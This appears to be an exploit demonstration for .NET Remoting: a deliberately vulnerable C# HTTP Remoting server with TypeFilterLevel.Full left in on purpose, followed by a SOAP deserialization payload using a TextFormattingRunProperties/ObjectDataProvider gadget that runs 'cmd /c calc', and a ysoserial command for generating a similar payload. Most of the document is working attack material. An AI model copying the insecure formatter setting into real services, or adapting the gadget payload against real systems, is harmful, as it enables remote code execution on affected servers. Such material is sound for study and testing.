VulnerableDotNetHTTPRemoting.cs

using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;

namespace ExampleRemoting
{
    public class DateTimeServer : MarshalByRefObject, IDisposable
    {
        public DateTimeServer()
        {
            Console.WriteLine("DateTime server activated");
        }

        ~DateTimeServer()
        {
            Console.WriteLine("DateTime server Object Destroyed.");
        }

        public void Dispose()
        {
            GC.SuppressFinalize(this);
        }

        public String MyMethod(String name)
        {
            String strMessage = "Hi " + name + ". Here is the current DateTime: " + DateTime.Now;
            Console.WriteLine(strMessage);
            return strMessage;
        }
    }

    public class Server
    {
        public static void Main()
        {

            SoapServerFormatterSinkProvider soapServerFormatterSinkProvider = new SoapServerFormatterSinkProvider()
            {
                TypeFilterLevel = TypeFilterLevel.Full // This is where we can exploit it without knowing anything about the application or having an 0day! Could be TypeFilterLevel.Low
            };

            IDictionary hashtables = new Hashtable();
            hashtables["port"] = 9999;
            hashtables["proxyName"] = null;
            hashtables["name"] = "Test Remoting Services";

            /* Creating the channel using SoapServerFormatterSinkProvider */
            //HttpChannel channel = new HttpChannel(9999);

            HttpChannel channel = new HttpChannel(hashtables, null, soapServerFormatterSinkProvider);
            ChannelServices.RegisterChannel(channel,false);
            RemotingConfiguration.RegisterWellKnownServiceType(typeof(DateTimeServer), "TuPutisimaMadreEnPatinete.soap", WellKnownObjectMode.Singleton);
            System.Console.WriteLine("press <enter> to exit.");
            System.Console.ReadLine();
        }

        public String MyMethod(String name)
        {
            String strMessage = "Hi " + name + ". Here is the current DateTime: " + DateTime.Now;
            Console.WriteLine(strMessage);
            return strMessage;
        }
    }
}

Payload 2:

<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">

<ForegroundBrush id="ref-3">&#60;ResourceDictionary

 xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;

 xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;

 xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;

 xmlns:Diag=&#34;clr-namespace:System.Diagnostics;assembly=system&#34;&#62;

 &#60;ObjectDataProvider x:Key=&#34;LaunchCalc&#34; ObjectType = &#34;{ x:Type Diag:Process}&#34; MethodName = &#34;Start&#34; &#62;

 &#60;ObjectDataProvider.MethodParameters&#62;

 &#60;System:String&#62;cmd&#60;/System:String&#62;

 &#60;System:String&#62;/c &#34;calc&#34; &#60;/System:String&#62;

 &#60;/ObjectDataProvider.MethodParameters&#62;

 &#60;/ObjectDataProvider&#62;

&#60;/ResourceDictionary&#62;</ForegroundBrush>

</a1:TextFormattingRunProperties>

</SOAP-ENV:Envelope>

ysoserial.exe -f SoapFormatter -g WindowsIdentity -c "calc" -o raw -t

Nice aDon90